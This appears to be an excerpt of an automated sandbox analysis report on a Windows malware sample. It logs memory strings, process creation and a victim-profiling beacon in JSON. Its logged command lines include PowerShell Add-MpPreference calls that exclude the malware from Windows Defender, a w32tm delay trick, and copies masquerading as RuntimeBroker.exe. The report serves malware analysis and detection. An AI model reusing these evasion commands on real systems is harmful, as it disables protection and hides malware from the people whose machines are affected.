Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Hyper-V-ClientEdition-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-vstack-vid.resources_31bf3856ad364e35_10.0.19041.1_en-us_447494df1222bcd8.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: pC:\Windows\servicing\Packages\Microsoft-Hyper-V-Services-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.488.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-windows-hyper-v-vfpext_31bf3856ad364e35_10.0.19041.1741_none_7543ca68a11c7040.manifest
Source: w32tm.exe, 00000017.00000002.1772743492.00000232EEE19000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-HyperV-OptionalFeature-VirtualMachinePlatform-Disabled-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: uC:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmms_31bf3856ad364e35_10.0.19041.2006_none_ab6b7b2814133920\vmms.exe
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tC:\Windows\servicing\Packages\Microsoft-Hyper-V-ClientEdition-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.mum
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: nC:\Windows\WinSxS\amd64_microsoft-hyper-v-hgs_31bf3856ad364e35_10.0.19041.1741_none_1bf0e7c12b78479b\vmhgs.dll
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vC:\Windows\servicing\Packages\Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-i..ationcomponents-rdv_31bf3856ad364e35_10.0.19041.1741_none_b62736d427ac1a0c\r\vmicrdv.dll
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: mC:\Windows\WinSxS\amd64_microsoft-hyper-v-bpa_31bf3856ad364e35_10.0.19041.1_none_555170071aa29c2c\Hyper-V.xsd
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ~C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-firewallrules_31bf3856ad364e35_10.0.19041.1_none_89d7babee737651c.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft.hyperv.powershell.cmdlets.misc_31bf3856ad364e35_10.0.19041.1_none_62d29611d5954e4f\Hyper-V.Types.ps1xml
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.19041.2006_none_a526c6e91aabcb1b\f\kdhvcom.dll
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-m..-client.snapinabout_31bf3856ad364e35_10.0.19041.1_none_43a9017744e82ca8\SnapInAbout.dll
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: wC:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmwp_31bf3856ad364e35_10.0.19041.1949_none_a9b86d6c1534dc66\r\vmwp.exe
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: yC:\Windows\servicing\Packages\Microsoft-Hyper-V-ClientEdition-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: wC:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-vstack_31bf3856ad364e35_10.0.19041.1_none_1aae8085937aee95.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Hyper-V-Hypervisor-merged-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft.hyperv.powershell.misc_31bf3856ad364e35_10.0.19041.1_none_1ce7d3781003c70f\Hyper-V.Format.ps1xml
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vC:\Windows\servicing\Packages\Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.mum
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-i..nents-rdv.resources_31bf3856ad364e35_10.0.19041.1_en-us_b3d1ef0d088d6955\vmicrdv.dll.mui
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-m..t-remotefilebrowser_31bf3856ad364e35_10.0.19041.746_none_6fbcad1699b89a67\f\RemoteFileBrowse.dll
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: }C:\Windows\servicing\Packages\Microsoft-Hyper-V-Offline-Core-Group-merged-Package~31bf3856ad364e35~amd64~~10.0.19041.1741.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \|C:\Windows\WinSxS\amd64_microsoft-windows-hyper-v-vfpext_31bf3856ad364e35_10.0.19041.1741_none_7543ca68a11c7040\f\vfpapi.dll
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-m..ients-firewallrules_31bf3856ad364e35_10.0.19041.1_none_a0e7047dc07f4f53.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: wC:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vsmb_31bf3856ad364e35_10.0.19041.1741_none_a3a0448c191b2fda\vmusrv.dll

Source: C:\Users\user\Desktop\ogVinh0jhq.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Process token adjusted: Debug
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\ogVinh0jhq.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ogVinh0jhq.exe'
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/user/AppData/Local/Microsoft/Windows/Explorer\RuntimeBroker.exe'
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ogVinh0jhq.exe'
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/user/AppData/Local/Microsoft/Windows/Explorer\ITlIQtTGhEyfMRHaLp.exe'
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ogVinh0jhq.exe'	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/user/AppData/Local/Microsoft/Windows/Explorer\RuntimeBroker.exe'	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ogVinh0jhq.exe'
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/user/AppData/Local/Microsoft/Windows/Explorer\ITlIQtTGhEyfMRHaLp.exe'

Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ogVinh0jhq.exe'	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/user/AppData/Local/Microsoft/Windows/Explorer\RuntimeBroker.exe'	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process created: C:\Users\user\Desktop\ogVinh0jhq.exe "C:\Users\user\Desktop\ogVinh0jhq.exe"	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ogVinh0jhq.exe'
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/user/AppData/Local/Microsoft/Windows/Explorer\ITlIQtTGhEyfMRHaLp.exe'
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\TJHXkWh8sx.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\Desktop\ogVinh0jhq.exe "C:\Users\user\Desktop\ogVinh0jhq.exe"

Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000005282000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.2913632595.0000000005324000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.2913632595.000000000539C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000005282000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.2913632595.0000000005324000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.2913632595.000000000539C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"878411","UserName":"user","IpInfo":{"ip":"8.46.123.189","city":"New York","region":"New York","country":"US","loc":"40.7123,-74.0068","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5,"extData":{"878f8167152e313f64df8bc19d70635c1ecbe7b4":"N","1e8a6ffe69dfa6666b97619733b651a142cced25":"N","1bb3c9545e774ff9327a8c05c0c82c91df70ca2d":"N","67360ecc12098125d035bd08fe5f23470ccb7f03":"N","bed024e087f20b0399df338aaed60cb02ac3a162":"N","e2cd12524d8efa17a8296192904c06b771caaa46":"N","fa65edd5156a5221269374ea04b77da00b88aaeb":"N","4ca179b9e8a576e0645159b6cc78546c280cba08":"N","47e382a2f383928bd7d40df51271a81a3638d557":"N","59a6e4d811a141bd38ec652d8916f3e43466f2a6":"N","70302d2d2553f0efb60993cef11e54947bda0b14":"N","292decf0ba3efb0fda8a1d98c06fdb9a00538382":"N","5f505762211e70b4634209c7591a86166a0b55e1":"N","bd45799ba9586a337a720d01c81fc6949857647a":"N","2f032521b028b7a6588f0fa62757dce01c304f2e":"N","3ea4266129846951e3f558f8b68787e9f5016aa9":"N","b0452891b5822db1c877e0aad20bb89fcdf2ef3f":"N","f2b3b5b7f6a919f2dadceda35e3e59cafc09bd4b":"N","f18aaa6e47f0a810a11efd09c40a0ca93c45cd28":"N","1697b08a971fb720e99a7e22b8b655e4dc3bc654":"N"}}H;
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000005282000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.2913632595.0000000005324000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.2913632595.000000000539C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"878411","UserName":"user","IpInfo":{"ip":"8.46.123.189","city":"New York","region":"New York","country":"US","loc":"40.7123,-74.0068","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5,"extData":{"878f8167152e313f64df8bc19d70635c1ecbe7b4":"N","1e8a6ffe69dfa6666b97619733b651a142cced25":"N","1bb3c9545e774ff9327a8c05c0c82c91df70ca2d":"N","67360ecc12098125d035bd08fe5f23470ccb7f03":"N","bed024e087f20b0399df338aaed60cb02ac3a162":"N","e2cd12524d8efa17a8296192904c06b771caaa46":"N","fa65edd5156a5221269374ea04b77da00b88aaeb":"N","4ca179b9e8a576e0645159b6cc78546c280cba08":"N","47e382a2f383928bd7d40df51271a81a3638d557":"N","59a6e4d811a141bd38ec652d8916f3e43466f2a6":"N","70302d2d2553f0efb60993cef11e54947bda0b14":"N","292decf0ba3efb0fda8a1d98c06fdb9a00538382":"N","5f505762211e70b4634209c7591a86166a0b55e1":"N","bd45799ba9586a337a720d01c81fc6949857647a":"N","2f032521b028b7a6588f0fa62757dce01c304f2e":"N","3ea4266129846951e3f558f8b68787e9f5016aa9":"N","b0452891b5822db1c877e0aad20bb89fcdf2ef3f":"N","f2b3b5b7f6a919f2dadceda35e3e59cafc09bd4b":"N","f18aaa6e47f0a810a11efd09c40a0ca93c45cd28":"N","1697b08a971fb720e99a7e22b8b655e4dc3bc654":"N"}}
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000005282000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager`
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000005282000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.2913632595.0000000005324000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.2913632595.000000000539C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: rica/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5,"extData

Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Queries volume information: C:\Users\user\Desktop\ogVinh0jhq.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
